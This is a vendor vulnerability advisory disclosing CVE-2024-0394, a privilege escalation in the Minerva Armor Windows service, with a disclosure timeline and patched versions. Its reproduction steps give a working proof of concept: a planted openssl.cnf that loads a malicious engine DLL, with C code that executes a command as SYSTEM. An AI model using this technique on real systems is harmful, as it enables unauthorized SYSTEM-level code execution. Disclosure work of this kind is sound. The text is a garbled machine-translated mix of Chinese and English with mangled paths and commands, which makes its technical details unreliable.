Last updated at Fri, 05 Apr 2024 20:45:32 GMT
Rapid7 is disclosing CVE-2024-0394, Rapid7 Minerva的Armor产品系列中的一个特权升级漏洞. Minerva使用开源的OpenSSL库来实现加密功能并支持安全通信. 这个漏洞的根本原因是Minerva对OpenSSL的实现 OPENSSLDIR 参数,该参数被设置为低权限用户(例如 C: \ git \ vcpkg \ \ openssl_x86-windows-static-vs2019-static \ openssl包.cnf). Rapid7已将此漏洞评估为CVSSv3得分为 7.8.
Impact
因为Minerva Armor是作为Windows服务运行的, 此漏洞允许任何经过身份验证的用户提升特权并使用SYSTEM特权执行任意代码. A low-privileged attacker can create an openssl.cnf 加载恶意OpenSSL引擎库, 导致在服务启动时作为SYSTEM执行任意代码.
Credit
Rapid7 would like to thank Will Dormann of Vul Labs 向我们披露此漏洞 Rapid7's vulnerability disclosure policy. 我们感谢Will和安全研究社区的工作,他们的工作使软件和系统对每个人都更安全.
Product Description
Minerva Armor技术是一个核心端点安全组件(仅限Windows),旨在防止规避恶意软件, ransomware, and advanced cyber attacks. Armor由世界各地的中小企业和企业组织在不同的部门和垂直领域运营和信任.
密涅瓦装甲技术是由密涅瓦实验室开发的 acquired by Rapid7 in March 2023. Armor是Minerva Armor和Rapid7下一代防病毒(NGAV)产品系列的一部分。. 装甲以前被用作Intego AV的OEM组件. Note: Insight代理不容易受到此问题的影响.
Exploitation
在Armor 32位服务启动期间(MVArmorService32.exe), Armor loads the OpenSSL library. OpenSSL是一个提供各种加密功能的库. This library has an internal directory tree that is used to locate the configuration file; this directory is called OPENSSLDIR. 配置文件驻留在OPENSSLDIR中 openssl.cnf. 这就是特权升级机会开始的地方.
当应用程序依赖于OpenSSL库时, 有必要在编译时指明OPENSSLDIR的完整路径, but at run-time, this path is not necessary. Therefore, 使用逆向工程技术和工具可以发现完整的路径, such as strings, ProcMon, and others.
If an attacker can place the openssl.cnf 文件并指定要加载的恶意库,则执行攻击者的代码. 这个漏洞的根本原因在于Minerva中的OpenSSL库的配置, 其中OPENSSLDIR参数设置为低权限用户可访问的路径, such as C: \ git \ vcpkg \ \ openssl_x86-windows-static-vs2019-static \ openssl包.cnf. Since Armor operates as a Windows service, 此漏洞允许任何经过身份验证的用户提升特权并使用SYSTEM特权执行任意代码. A low-privileged user can create the openssl.使用上面提到的配置文件来加载恶意OpenSSL引擎库, 导致在服务启动时作为SYSTEM执行任意代码.
下面是一个ProcMon捕获的装甲服务寻找 openssl.cnf file:
Steps To Reproduce
所有步骤都以低权限认证用户执行:
- 创建“C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static”目录:
mkdir“C: \ git包\ vcpkg \ \ openssl_x86-windows-static-vs2019-static” - Create an
.cnf filewith the following contents:
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\danik\\calc.dll
init = 0
- Create the c:\danik folder:
mkdir “C:\danik” - 编译并链接一个恶意的“OpenSSL库”——下面的代码将运行Windows计算器:
#include
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("calc");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
- Copy
calc.dllfrom above to the “C:\danik” directory. - Restart the Armor service or the whole machine.
Remediation
为了修复CVE-2024-0394, Minerva客户应该更新最新版本:
| Customers | Remediated version |
|---|---|
| Minerva customers | Armor version 4.5.5 |
| Minerva Armor OEM customers | Armor OEM version 4.5.5 |
Disclosure Timeline
January 8, 2024: Issue reported to Rapid7 by Will Dormann of Vul Labs
January 9, 2024: Rapid7 acknowledges report
January 11, 2024: Rapid7重现问题,确认漏洞
January - February 2024: Rapid7 engineering team develops and tests fix, requests information from partner on potentially vulnerable implementation; partner confirms they are no longer offering vulnerable implementation.
March 12, 2024: Rapid7联系记者询问我们之前是否沟通过修复时间表
March 19, 2024: Rapid7分配CVE,向报告人员更新修复准备情况,确认受影响/修复的版本. Rapid7和记者同意将2024年4月3日作为协调的披露日期.
April 3, 2024: This disclosure; fix released.
